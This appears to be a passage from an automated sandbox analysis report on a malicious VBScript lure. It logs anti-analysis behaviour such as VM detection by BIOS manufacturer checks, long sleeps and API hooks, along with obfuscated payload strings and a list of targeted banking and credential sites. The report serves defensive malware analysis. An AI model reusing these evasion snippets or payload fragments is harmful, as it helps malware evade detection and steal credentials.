            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 58B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 69E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 79E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 1525Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 8447Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5632Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep count: 1525 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep time: -3050000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep count: 8447 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 576Thread sleep time: -16894000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe TID: 3712Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: IsVirtualMachine = isVM
            Source: 47T9R4KG.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: wscript.exe, 00000000.00000003.2026393125.000001B7B2B85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026368215.000001B7B2B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026269673.000001B7B2B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /!!bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aX0PizREz6Xt@O9kdaZ66tX3!!YucaZL4ob&&MSXgOe7zdH6a&&2T7Kh7h&&xPEFnDveIpYgbw&&NxH0cQDwq5a1LxbgFRvqIhLatqqjgNUE/+buy@vi!!1DcOpuNBaSQ4gHnjThiF1Hv+5X&&FrpDrDP4
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: global block list test formVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
            Source: wscript.exe, 00000000.00000003.2036564223.000001B7B579D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037401880.000001B7B57D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2036436092.000001B7B579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035792745.000001B7B575B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037108856.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2034316194.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030465925.000001B7B575B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035966452.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2027250785.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2036079326.000001B7B578D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2039257084.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps
            Source: 47T9R4KG.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: JogKDBeJAc.exe, 00000007.00000002.3303933658.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: wscript.exe, 00000000.00000003.2044030653.000001B7B599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2042623223.000001B7B599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043298653.000001B7B599E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ec1ilguHnBurW/Vbts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFpsVhHx/aX0PizREz6Xt
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: wscript.exe, 00000000.00000003.2016235519.000001B7B2B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016344145.000001B7B2B51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016022728.000001B7B2B39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016208340.000001B7B2B4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!BwD@povoq?joR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZ!!O2R@zrlyhN3QahzLxrC!!?e2z!!yFbFZOL5fT+e?uPl25hGfSp&&Z
            Source: 47T9R4KG.6.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: wscript.exe, 00000000.00000003.2048683705.000001B7B57AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050801516.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046961495.000001B7B5773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048850003.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047406300.000001B7B5791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051389311.000001B7B57BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046591650.000001B7B5726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050421312.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049154272.000001B7B57A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051558296.000001B7B57C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051733995.000001B7B57C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/VXVlcXVBwDApovoqWjoR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZVO2RAzrlyhN3QahzLxrCVWe2zVyFbFZOL5fT+eWuPl25hGfSp
            Source: wscript.exe, 00000000.00000003.2012610434.000001B7B4A01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineYOcw4bl58Q
            Source: wscript.exe, 00000000.00000003.2020449015.000001B7B5875000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021020722.000001B7B5983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aX0PizREz6Xt@O9kdaZ66tX3!!YucaZL4ob&&MSXgOe7zdH6a&&2T7Kh7h&&xPEFnDveIpYgbw&&NxH0cQDwq5a1LxbgFRvqIhLatqqjgNUE/+buy@vi!!1DcOpuNBaSQ4gHnjThiF1Hv+5X&&FrpDrDP4
            Source: 47T9R4KG.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: InStr(objItem.Manufacturer, "QEMU") > 0 Then
            Source: PO1341489LTB GROUP.vbsBinary or memory string: If InStr(objItem.Manufacturer, "VMware") > 0 Or _
            Source: wscript.exe, 00000000.00000003.2012610434.000001B7B4A01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUdtkBQ0cw3yQ??fti3e@vQN+l3OxBIFk@fFflaP@?mc4/P+ZrxD0tC9cohjBm3z+IO/hgPGI7Ct0211zg1f?0R81wUP7?r0uRlHzQfOhQC6k/4SawIw*E@OvpKZea8?lR!!DNvegjlz6Lxu*3gN10t8&&S@@IPglt+I+acRrykLS1eUF9oGqK8blnfTejFDz!!KS9pSFzrgcE1C@BOgPxY3cR&&6jbrB8mT89bTQzI934i1u2O+YtRcGzFzGCiYga?PLL+kR9R6gSdjG!!zoxDvMPLjy60aKcaq28oriRUw5xhpQ?ip?cCTR6ksP3HvU0x+HNxQgGEooyPTN3lRlIN+k8sj5CpB@rdEoPCL*8iu5s5l3?GTsb?fsu/tm&&hH5&&CiEQ659zuNy3xCuZwtZhLK?IiT*&&jdw4vls4chbg5rGOwi3MxHSxmDP2YvSFmn6PIgRrQCSM0fHajD272IPkkq871OdMPh4@M9LmtPyjk7dwT?a!!gFwKareyMzkK61w2p6D*uzMD?G1uvbii84l*FSQ3zM/Eo?w62aziCddschGsrjqH4945Q2U4SkyEzP
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: wscript.exe, 00000000.00000003.2023069690.000001B7B5710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023184426.000001B7B5727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023721491.000001B7B5740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021805033.000001B7B5631000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023949787.000001B7B574A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2023751121.000001B7B5749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: puPl25hGfSp&&XPN1fn&&c2E5TTq9+eO+6bYwMDj2HMgCLQZkgtSC6P1v
            Source: wscript.exe, 00000000.00000003.2055140201.000001B7B4A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareI1xDM1i
            Source: wscript.exe, 00000000.00000003.2013627427.000001B7B5804000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013406419.000001B7B57F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013880983.000001B7B5807000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012809336.000001B7B57B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013122046.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015395176.000001B7B5816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!BwD@povoq?joR/dQmRz7pZcUzoBP8yv/sS9O/OqQYiq0oZF5B7NvSZ!!O2R@zrlyhN3QahzLxrC!!?e2z!!yFbFZOL5fT+e?uPl25hGfSp&&q
            Source: 47T9R4KG.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 47T9R4KG.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2055140201.000001B7B4A03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUdtkBQ0cw3yQ??fti3e@vQN+l3OxBIFk@fFflaP@?mc4/P+ZrxD0tC9cohjBm3z+IO/hgPGI7Ct0211zg1f?0R81wUP7?r0uRlHzQfOhQC6k/4SawIw*E@OvpKZea8?lR!!DNvegjlz6Lxu*3gN10t8&&S@@IPglt+I+acRrykLS1eUF9oGqK8blnfTejFDz!!KS9pSFzrgcE1C@BOgPxY3cR&&6jbrB8mT89bTQzI934i1u2O+YtRcGzFzGCiYga?PLL+kR9R6gSdjG!!zoxDvMPLjy60aKcaq28oriRUw5xhpQ?ip?cCTR6ksP3HvU0x+HNxQgGEooyPTN3lRlIN+k8sj5CpB@rdEoPCL*8iu5s5l3?GTsb?fsu/tm&&hH5&&CiEQ659zuNy3xCuZwtZhLK?IiT*&&jdw4vls4chbg5rGOwi3MxHSxmDP2YvSFmn6PIgRrQCSM0fHajD272IPkkq871OdMPh4@M9LmtPyjk7dwT?a!!gFwKareyMzkK61w2p6D*uzMD?G1uvbii84l*FSQ3zM/Eo?w62aziCddschGsrjqH4945Q2U4SkyEzP!
            Source: wscript.exe, 00000000.00000003.2078472389.000001B7B2BEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
            Source: 47T9R4KG.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: wscript.exe, 00000000.00000003.2052827588.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048683705.000001B7B57AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050801516.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046961495.000001B7B5773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048850003.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047406300.000001B7B5791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046591650.000001B7B5726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050421312.000001B7B57AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051558296.000001B7B57D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2051073170.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd"l
            Source: 47T9R4KG.6.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 47T9R4KG.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: wscript.exe, 00000000.00000003.2028668890.000001B7B585B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035256262.000001B7B2BAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035413648.000001B7B586F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038581784.000001B7B5876000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2027250785.000001B7B57CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030296150.000001B7B2BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2038909952.000001B7B5879000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2029566731.000001B7B2B39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yFbFZOL5fT+eWuPl25hGfSp&&XPN1fn&&c2E5TTq9+eO+6bYwMDj2HMgCLQZkgtSC6P1vWM5qFRUS5xBfXnRL5t9uHaMY+9u/@bc/0XtI&&olWMPYT9Wj9yn00bUbS@Y3eBWEH
            Source: wscript.exe, 00000000.00000003.2040695157.000001B7B5734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040173576.000001B7B5727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ec1ilguHnBurW/Vbts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFpsVhHx/aX0PizREz6Xtz
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: Function IsVirtualMachine()
            Source: wscript.exe, 00000000.00000003.2042738290.000001B7B59B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040024801.000001B7B5829000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043250832.000001B7B59B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2042350751.000001B7B59AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2043540585.000001B7B59BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zrlyhN3QahzLxrCVWe2zVyFbFZOL5fT+eWuPl25hGfSp&&XPN1fn&&c2E5TTq9+eO+6bYwMDj2HMgCLQZkgtSC6P1vWM5qFRUS5xBfXnRL5t9uHaMY+9u/
            Source: 47T9R4KG.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 47T9R4KG.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 47T9R4KG.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 47T9R4KG.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 47T9R4KG.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 47T9R4KG.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 47T9R4KG.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 47T9R4KG.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: wscript.exe, 00000000.00000003.2017058831.000001B7B2BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016553463.000001B7B2B8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2017519614.000001B7B2BC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016643711.000001B7B2BA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2017271967.000001B7B2BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016344145.000001B7B2B65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2017295131.000001B7B2BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016022728.000001B7B2B39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016109222.000001B7B2B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xRU2Q0i78Nk//i7u6UgTl1+BTk@ec1ilguHnBur?/!!bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/a
            Source: wscript.exe, 00000000.00000003.2078814446.000001B7B4901000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078626301.000001B7B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078505479.000001B7B5465000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011482265.000001B7B4A04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2011595490.000001B7B4B7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2078730551.000001B7B4F02000.00000004.00000020.00020000.00000000.sdmp, PO1341489LTB GROUP.vbsBinary or memory string: If IsVirtualMachine() Then
            Source: 47T9R4KG.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 47T9R4KG.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: wscript.exe, 00000000.00000003.2018509106.000001B7B57B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: puPl25hGfSp&&XPN1fn&&c2E5TTq9+eO+6bYwMDj2HMgCLQZkgtSC6P1vr
            Source: wscript.exe, 00000000.00000003.2019496645.000001B7B2B4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2019617090.000001B7B2B52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2019085885.000001B7B5857000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2019719468.000001B7B5874000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2021122568.000001B7B2B55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018848320.000001B7B57D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2018509106.000001B7B57B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2019886655.000001B7B2B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /!!bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aX0PizREz6Xt@O9kdaZ66tX3!!YucaZL4ob&&MSXgOe7zdH6a&&2T7Kh7h&&xPEFnDveIpYgbw&&NxH0cQDwq5a1LxbgFRvqIhLatqqjgNUE/+buy@vi!!1DcOpuNBaSQ4gHnjThiF1Hv+5X&&FrpDrDP
            Source: wscript.exe, 00000000.00000003.2049954037.000001B7B5754000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050517121.000001B7B575B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049441987.000001B7B5742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046591650.000001B7B5726000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048055015.000001B7B573D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048850003.000001B7B5742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049906380.000001B7B5751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd
            Source: wscript.exe, 00000000.00000003.2013627427.000001B7B5804000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013406419.000001B7B57F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013880983.000001B7B5807000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012809336.000001B7B57B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2013122046.000001B7B57D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014712998.000001B7B5829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xRU2Q0i78Nk//i7u6UgTl1+BTk@ec1ilguHnBur?/!!bts65rgOaGtFIH&&Npel50n&&4EKoyxTY+TbecbrqodKOq9w0sfKwb0nT&&Mfn1yZnSU6KuqEmUYz/HIhkmPNmeGpd&&B7aHBB3G7PNMUxRRMDvoFvf7Bmiq7/oD6ga4aSB9HsujB2mh97kzFrw4j76O/9u07rlDOwFps!!hHx/aK
            Source: 47T9R4KG.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: firefox.exe, 00000009.00000002.2627684781.0000012BD580C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
